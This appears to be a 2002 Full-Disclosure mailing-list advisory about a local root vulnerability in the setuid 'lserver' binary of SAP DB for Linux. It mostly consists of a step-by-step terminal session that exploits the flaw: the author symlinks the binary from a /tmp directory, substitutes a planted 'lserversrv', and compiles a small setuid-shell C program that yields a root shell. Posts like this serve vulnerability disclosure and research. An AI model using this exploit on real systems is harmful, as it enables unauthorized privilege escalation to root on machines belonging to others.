Next message: Wana Thomas: "Local root vulnerability found in exim 4.x (and 3.x)"
Hey folks,
During an evaluation of the SAP database for linux I located a
security issue in one of their suid binaries. This issue is a symlink
attack against a binary that makes an execve call to a file in your
current directory. The details of this issue are outlined below. You
should be able to exploit this by hand however I included a simple exploit.
The alert from SAP is located here:
http://www.sapdb.org/sap_db_alert.htm
This code and alert will be added to http://www.snosoft.com/research
-KF
---------
This local attack upon SAP is based on sapdb-server-linux-32bit-i386-7_3_0_29.tgz
it is currently unknown if this affects other SAP flavors.
[elguapo@rh8 pgm]$ pwd
/usr/sapdb/depend/pgm
[elguapo@rh8 pgm]$ ls -al lserver
-rwsrwxr-x 1 root sapdb 15673 Oct 22 10:42 lserver
Using ltrace we can see an attempt to run ./lserversrv via execve()
[elguapo@rh8 pgm]$ ltrace ./lserver
__libc_start_main(0x08048800, 1, 0xbffff994, 0x08048690, 0x08048a0c <unfinished ...>
__register_frame_info(0x0804a0b8, 0x0804a1bc, 0xbffff948, 0x080486b5, 0x4212a2d0) = 0
malloc(10) = 0x0804a200
strcpy(0x0804a200, "./lserver") = 0x0804a200
execv("./lserversrv", 0xbffff994 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++
The problem with this execve call is that when looking for "./lserversrv" the lserver
does not check for any symlinks. The abuser can very easily make his own lserversrv.
We are just going to make a directory in /tmp to use for scratch space
[elguapo@rh8 pgm]$ cd /tmp
[elguapo@rh8 tmp]$ mkdir "snosoft+sapdb=root"
[elguapo@rh8 tmp]$ cd "snosoft+sapdb=root"
Next we make a symlink to the suid binary lserver
[elguapo@rh8 snosoft+sapdb=root]$ ln -s /usr/sapdb/depend/pgm/lserver lserver
As we saw above lserver trys to do the following:
execv("./lserversrv", 0xbffff994 <unfinished ...>
This is easy enough to take advantage of...
[elguapo@rh8 snosoft+sapdb=root]$ cp /usr/bin/id lserversrv
As you can see we have the euid of root at this point in time...
[elguapo@rh8 snosoft+sapdb=root]$ /tmp/snosoft+sapdb\=root/lserver
uid=500(elguapo) gid=500(elguapo) euid=0(root) groups=500(elguapo)
Finishing up the task is trivial from there...
[elguapo@rh8 snosoft+sapdb=root]$ cat > root.c
main(){
setuid(0);
setgid(0);
system("/bin/sh");
}
[elguapo@rh8 snosoft+sapdb=root]$ cc -o root root.c
[elguapo@rh8 snosoft+sapdb=root]$ cp root lserversrv
[elguapo@rh8 snosoft+sapdb=root]$ ./lserver
sh-2.05b# id
uid=0(root) gid=0(root) groups=500(elguapo)
Copyright SNOSoft Inc. 2002
-KF
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30
: Wed Dec 04 2002 - 07:56:21 PST